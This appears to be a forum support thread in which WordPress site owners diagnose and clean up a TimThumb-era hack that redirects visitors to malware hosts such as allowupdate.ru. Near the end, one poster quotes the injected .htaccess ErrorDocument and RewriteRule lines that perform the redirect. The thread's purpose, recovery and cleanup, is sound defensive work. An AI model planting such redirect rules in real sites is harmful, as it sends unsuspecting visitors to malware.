It looks like you may have a 301 re-direct happening in the root of your domain. Here was the response I got when I tried to access your domain:
URL: //www.wendyjonescoaching.ca
Redirects: 301 -> //allowupdate.ru/source/index.php
When I visit your blog, I get linked to a malware/trojan installation attempt from //www1.simple-kwnholdr.rr.nu/xxxblahblah…
Every cached page I visit for the site in the root of your domain throws up an alert. You should begin inspecting files. You’re also in need of a WordPress upgrade, after the problem is resolved.
[edit]
FAQ My site was hacked
Some more helpful information:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/
http://codex.wordpress.org/Hardening_WordPress
Thanks for the response.
What should I be inspecting files for exactly?
First thing you may want to do is let support at Dreamhost know. They may have some advice for you.
I’ve experienced a similar hack and am trying to track it down, I’ve restored my database and site files but still no luck. 🙁
http://www.ryancannonray.com/wp-admin
It’s probably the TimThumb hack.
Go read the posts at http://blog.sucuri.net/ about it. Use their scanner to see if you’re impacted.
This particular hack came the day after I updated my theme to fix the issue, must have happened and been infected before the update.
Nonetheless, the issue lies within your .htaccess file. Mine only affected my root domain and was in the .htaccess file in the public_html folder.
If you’re infected you’ll also notice some other .htaccess files with weird names as well. Delete those right away. Open up your main .htaccess file and scroll down as they’ve put a lot of spaces to push the hack down. Find all of that code below the giant white space and delete it and save your .htaccess file.
I’ve changed my WP admin password just in case as well as the user access to my server. From there I’ve installed a plugin called Bullet Proof Security that helps create a secure .htaccess file as well as double check all of my folder permissions on WordPress with another plugin called BackupBuddy. It has a server info feature that shows your folder permissions. 🙂
Hope that helps as I seem to be up and running with a clean site and fixed timthumb file.
ryanr14 – Bingo 🙂 Just because you changed the file does NOT mean you weren’t infected before.
Change your SQL and SSH/FTP passwords as well.
i have same problem here, 5 of my wordpress sites are infected by this, some are redirected to http://www.allowupdate.ru when i enter their domains some are not.
Ryan14 – I did everything as you described, one of sites i can load, but when i go to add new plugins it redirects again to http://www.allowupdate.ru.
Also you didn solve your problem i went to your website: http://www.ryancannonray.com/on-the-plane-again/ and it redirects me to
http://powerprogramm.ru/make/index.php
What happened to me, as a non technical user, most of the blog seemed OK but if I searched for a plugin, the site would request some data from allowupdate.ru and the whole site would suddenly look like a poorly replicated WP dashboard.
I found these lines in my .htaccess file:
ErrorDocument 400 http://allowupdate.ru/source/index.php
ErrorDocument 401 http://allowupdate.ru/source/index.php ErrorDocument 403 http://allowupdate.ru/source/index.php ErrorDocument 404 http://allowupdate.ru/source/index.php ErrorDocument 500 http://allowupdate.ru/source/index.php
Then some other code which seemed harmless, something about search engines, then this:
RewriteRule ^(.*)$ http://allowupdate.ru/source/index.php [R=301,L]
Once I got rid of these everything was fine. Though I now have another 50 odd sites to go through and take this stuff out. Time to move everything to a VPS I think 😉